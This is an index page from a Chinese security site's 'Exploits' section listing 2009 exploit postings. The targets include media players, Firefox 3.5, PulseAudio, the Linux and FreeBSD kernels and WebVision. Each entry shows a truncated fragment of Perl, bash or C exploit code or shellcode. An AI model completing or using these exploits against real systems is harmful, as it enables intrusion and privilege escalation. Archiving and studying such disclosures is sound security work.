首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH)
  日期:2009-07-21 10:42:53 点击:29 评论:0
# *+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.* # }{ SkuLL-HacKeR }{ # *+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.*+.* #!/usr/bin/perl #[+] Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH) # win32_exec
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl)
  日期:2009-07-21 10:42:10 点击:34 评论:0
################################################## # FireFox 3.5 Heap Spray # Discovered by: Simon Berry-Bryne # Coded in Perl by netsoul, ALTO PARANA - Paraguay # Contact: netsoul2 [at] gmail [dot] com ##############################################
Acoustica MP3 Audio Mixer 2.471(.m3u) Local Heap Overflow PoC
  日期:2009-07-21 10:41:33 点击:33 评论:0
#!/usr/perl/bin -w # # #Foundr By : D3V!L FucK3r # #MY Email: w0@live.no # #Download : http://www.acoustica.com # #Tested on : Windos vista sp1 # #Version : mp3 audio mixer v.2.471 Demo # #if you Click and select file then ...... :) # # perl For a m
Acoustica MP3 Audio Mixer 2.471 (.sgp file) Crash Exploit
  日期:2009-07-21 10:40:43 点击:23 评论:0
#!/usr/bin/perl -w # # Acoustica MP3 Audio Mixer 1.0 (.sgp file) Crash Vulnerability Exploit # # Founded and exploited by prodigy # # Contact: smack_the_stream@hotmail.com # # Vendor: www.acoustica.com # # Usage to reproduce the bug: when you create
Medieval CUE Splitter Local Stack Overflow PoC
  日期:2009-07-21 10:39:52 点击:46 评论:0
#!/usr/bin/perl #Medieval CUE Splitter Local Stack Overflow PoC # By ViRuS_HaCkErS # Big THnx to THE DOOM FINAL BLUE HACKER ALL SPIDERS TEAM # down: http://www.medieval.it/sw/cuesplitter_setup.exe my $header1= x46x49x4cx45x20x22; my $header2=
PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)
  日期:2009-07-21 10:35:40 点击:120 评论:0
PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp (or change config.h). Must be on same f
PulseAudio setuid Local Privilege Escalation Exploit
  日期:2009-07-21 10:34:05 点击:35 评论:0
#!/bin/bash pulseaudio=`which pulseaudio` workdir=/tmp #workdir=$HOME id=`which id` shell=`which sh` trap cleanup INT function cleanup() { rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c rm -rf $workdir/PATMP* } cat $workdir/pa_r
FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit
  日期:2009-07-21 10:33:13 点击:88 评论:0
/* pecoff_panic.c * * by Shaun Colley, 20 July 2009 * * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`) * * panic(9) is in vm_fault due to a
EpicDJ 1.3.9.1 (.mpl/.m3u) Local Heap Overflow PoC
  日期:2009-07-21 10:32:50 点击:75 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # EpicDJ 1.3.9.1 (.mpl / .m3u ) Local heap Overflow PoC # http://www.epicdjsoftware.com/ ######################################################################################## ################################
EpicVJ 1.2.8.0 (.mpl/.m3u) Local Heap Overflow PoC
  日期:2009-07-21 10:31:56 点击:33 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # EpicVJ 1.2.8.0 (.mpl / .m3u ) Local heap Overflow PoC # http://www.epicdjsoftware.com/ ######################################################################################## ################################
Adobe related service (getPlus_HelperSvc.exe) Local Privilege Escalation
  日期:2009-07-21 10:28:10 点击:25 评论:0
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group site: http://retrogod.altervista.org/ description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x
XSS JavaScript Obfuscator 0.01A
  日期:2009-07-20 12:36:24 点击:107 评论:0
xssjo.htm !-- XSS JavaScript Obfuscator 0.01A Copyright (C) 2009 John Leitch john.leitch5@gmail.com This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free So
PulseAudio suffers from a local race condition privilege escalation vulnerabilit
  日期:2009-07-20 12:29:45 点击:74 评论:0
/* ------------------------------------------------------------------------ PulseAudio local race condition privilege escalation vulnerability ------------------------------------------------------------------------ Yorick Koster, June 2009 --------
Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day
  日期:2009-07-20 12:17:36 点击:323 评论:0
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable :) Also, bypass of mmap_min_addr via SELinux
WebVision 2.1 (news.php n) Remote SQL Injection Exploit
  日期:2009-07-20 12:17:02 点击:27 评论:0
#!/usr/bin/perl -w # WebVision 2.1 (n) Remote SQL Injection Exploit # Demo : http://www.webdev4all.nl/demowebsite/ # Dork : Webdevelopment Tinx-IT # Dork2: Copyright 2006-2008 Tinx-IT # and open your mind # admin panel : www.target.com/path/cms # Fo
Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH)
  日期:2009-07-20 12:16:23 点击:35 评论:0
#Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh) #First:http://milw0rm.com/exploits/8624 #By: ThE g0bL!N my $crash=x41 x 5000 ; # just random open(myfile,'UI.txt') ; print myfile $crash; # Usage: After Clicking On file Perl Copy TXT Fi
htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
  日期:2009-07-20 12:15:43 点击:52 评论:0
#!/usr/bin/perl # htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit # http://en.securitylab.ru/poc/extra/382563.php Bufferoverflow POC # By ksa04 # j-7[at]hotmail[dot]com # From Kingdom of Saudi Arabia #[+]------------------------------------
Streaming Audio Player 0.9 (skin) Local Stack Overflow PoC (SEH)
  日期:2009-07-20 12:15:15 点击:23 评论:0
#Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh) #By: ThE g0bL!N my $crash=x41 x 5000 ; # just random open(myfile,'UI.txt') print myfile $crash; # Usage: After Clicking On file Perl Copy TXT File on this Diredtory skindefault Then
win32/xp sp2 (En) cmd.exe 23 bytes
  日期:2009-07-20 12:14:27 点击:21 评论:0
/* win32/xp sp2 (En) cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with olly debugger 0040200
Easy RM to MP3 Converter .m3u file Universal Stack Overflow Exploit
  日期:2009-07-20 12:13:46 点击:39 评论:0
#!/usr/bin/perl # Easy RM to MP3 Converter .m3u file Universall Stack Overflow Exploit # it's so diferent to the first exploit .pls # by stack # xd Alpha zrebti 3liha :d # Thnx to Zigma His0k4 HOD my $header= x23x45x58x54x4Dx33x55x0Dx0Ax23
共637页/12733条记录 首页 上一页 [437] [438] [439] 440 [441] [442] [443] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved